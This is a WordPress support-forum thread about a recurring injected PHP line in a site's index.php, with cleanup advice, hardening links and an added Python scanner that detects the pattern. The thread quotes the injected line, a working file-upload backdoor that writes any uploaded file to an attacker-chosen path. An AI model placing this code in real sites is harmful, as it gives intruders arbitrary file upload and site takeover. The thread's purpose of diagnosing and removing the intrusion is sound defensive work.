Random $_FILES['F1l3'] Code
-
I have a website where, every now and then, the index.php file in the root directory gets modified and the following line of code gets added at the very top:
if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}
This line of code then appears at the top of the live website, which I have to keep going in and deleting. I did a Google search but all I could find were dozens of other websites with the same problem. Does anyone know what this is and why it continues to appear in the index file?
I am using the theme Terso, FYI.
-
http://www.goldenagemedia.com.au/ this site?
I see this right away
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.0
Outdated Web Server Apache Found: Apache/2.2.24
No, not that site. It doesn’t matter what site it is, as I’ve removed the offending code already.
Besides, an outdated version of wordpress should not cause the issue as stated above.
> Besides, an outdated version of wordpress should not cause the issue as stated above.
Well, it certainly will make the site unsecured.
I’m only looking for solutions to my initial problem, please try and stay on topic.
I think kmessinger’s point was that being unsecured is likely related to your problem, given the kinds of sites that are appearing in the Google results. You may wish to review some of these resources:
http://codex.ww.wp.xz.cn/FAQ_My_site_was_hacked
http://ww.wp.xz.cn/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Additional Resources:
http://codex.ww.wp.xz.cn/Hardening_WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
Thanks Stephen. The website was hacked despite wordpress and plugins being up to date, so I replaced all wordpress install files/folders, upgraded the theme and changed both FTP and wordpress passwords.
It seems to be just this $_FILES['F1l3'] thing that has come back twice now after deletion.
Hello ‘goldenagemedia’,
My site was hacked yesterday night. Even I see similar content ($_FILES['F1l3']) in some of wordpress files.
After upgrading wordpress and theme is your site back? Did you do anything else to fix the issue?
Thanks,
Yes I managed to get it up and running again after reinstalling everything, although overnight it seems to have happened again.
I have replaced the index.php and wp-blog-header.php files again to fix it, but here is a screengrab of the problem when it happens:
https://drive.google.com/file/d/0B_DiQO5cOpWkczA0em9hSGVLcDg/view
I think this site might just be being targeted, not sure.
> it seems to have happened again.
That’s generally what happens with hacked sites unless you’ve fully cleaned up the hack and secured the site. Did you go through all of the resources listed above?
Yes I’ve dealt with many hacked sites over the years, and the methods such as the ones listed above have usually fixed them, with no recurring issues.
This one is different to what I’ve dealt with before (I’ve never seen this code also). No matter how many times I remove the malicious code, it keeps coming back a few days later.
Hello everyone, I'm new here.
Sorry, I know this topic is old but I just found out that one of my websites is having the same problem as described above.
I cleaned all files where I found that piece of code, and I removed one file called zxcvbnm.php where there was this piece of code:
<!-------------------------------------------- Sat Apr 4 18:05:04 EST 2015 owned by NG689Skw (Index Php) [email protected], Indonesia twitter.com/_IndexPhp_ --------------------------------------------->
Malware code deleted
Also I updated wordpress and all plugins, but I am curious how these Indonesians get into this website. What should I do to prevent this from happening again?
Did anyone find out how to get rid of this for good?
@blshka Please do not post malware code in these forums.
Delousing a compromised installation isn’t easy but all that we can offer is in this list of links.
You need to start working your way through these resources:
http://codex.ww.wp.xz.cn/FAQ_My_site_was_hacked
http://ww.wp.xz.cn/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html
AnnaBell,
I fixed my hacked website by performing the following steps:
1. Changed passwords for both WordPress backend and FTP hosting account.
2. Deleted wp-includes, wp-admin and root files (except the wp-config.php)
4. Opened my wp-config.php file to make sure there was no malware code in it
3. Re-installed WordPress files/folders manually
4. Updated all plugins
5. Installed Wordfence plugin and ran a scan
6. Found files that were infected or shouldn’t be there and either had them removed by Wordfence or found the file via FTP and removed the malware from the file
FYI: I found a lot of new files were strewn throughout the Uploads folder. Wordfence was great as it picked up on all these and I just deleted them via Wordfence.
The unfortunate reality is hacking is just a part of web life now. I have had a fair few websites hacked lately by the Gantengers Crew from Indonesia, who openly gloat about their hacking accomplishments.
Hope this helps you.
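Added example, not part of the original thread and not any poster's code: the injected line moves whatever file arrives in the `F1l3` form field to the path given in the `Name` POST field, so the cleanup steps above need to catch both that pattern and any PHP files left under the uploads folder. The sketch below scans a docroot for both; the sample tree, the file name `stray.php` and the reason strings are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Upload handler whose destination path comes straight from request data, as in
# the injected line: move_uploaded_file($_FILES[..]['tmp_name'], $_POST['Name'])
UPLOAD_BACKDOOR = re.compile(
    r"move_uploaded_file\s*\(\s*\$_FILES\s*\[[^\]]+\]\s*\[[^\]]+\]\s*,"
    r"\s*\$_(?:POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7", ".phar"}

def scan_tree(root):
    """Return sorted (relative_path, reason) findings for a WordPress docroot."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        # Media uploads are not PHP, so any PHP file here deserves a manual look.
        if rel.startswith("wp-content/uploads/"):
            findings.append((rel, "PHP file under uploads directory"))
        text = path.read_text(encoding="utf-8", errors="replace")
        if UPLOAD_BACKDOOR.search(text):
            findings.append((rel, "upload handler with request-controlled destination"))
    return sorted(findings)

def build_sample_site(root):
    """Constructed sample tree: injected index.php, a benign handler, a stray upload."""
    root = Path(root)
    (root / "wp-content/uploads/2015/04").mkdir(parents=True)
    (root / "wp-includes").mkdir()
    (root / "index.php").write_text(
        "<?php if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], "
        "$_POST['Name']); echo 'OK'; Exit;} ?>\n<?php require 'wp-blog-header.php';\n")
    # Benign shape: the destination is built server-side, not taken from the request.
    (root / "wp-includes/media.php").write_text(
        "<?php move_uploaded_file($_FILES['f']['tmp_name'], $upload_dir . $safe_name);\n")
    (root / "wp-content/uploads/2015/04/stray.php").write_text("<?php /* placeholder */\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, reason in scan_tree(build_sample_site(tmp)):
            print(f"{rel}: {reason}")
```

A clean scan only means this one pattern is absent; obfuscated variants will not match, so it complements rather than replaces replacing core files and running a scanner such as Wordfence.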
Thanx guys for all advices,
I did most of those things you mentioned, so far everything looks good.
Hopefully it will not come back.
Thnx once again
The topic ‘Random $_FILES['F1l3'] Code’ is closed to new replies.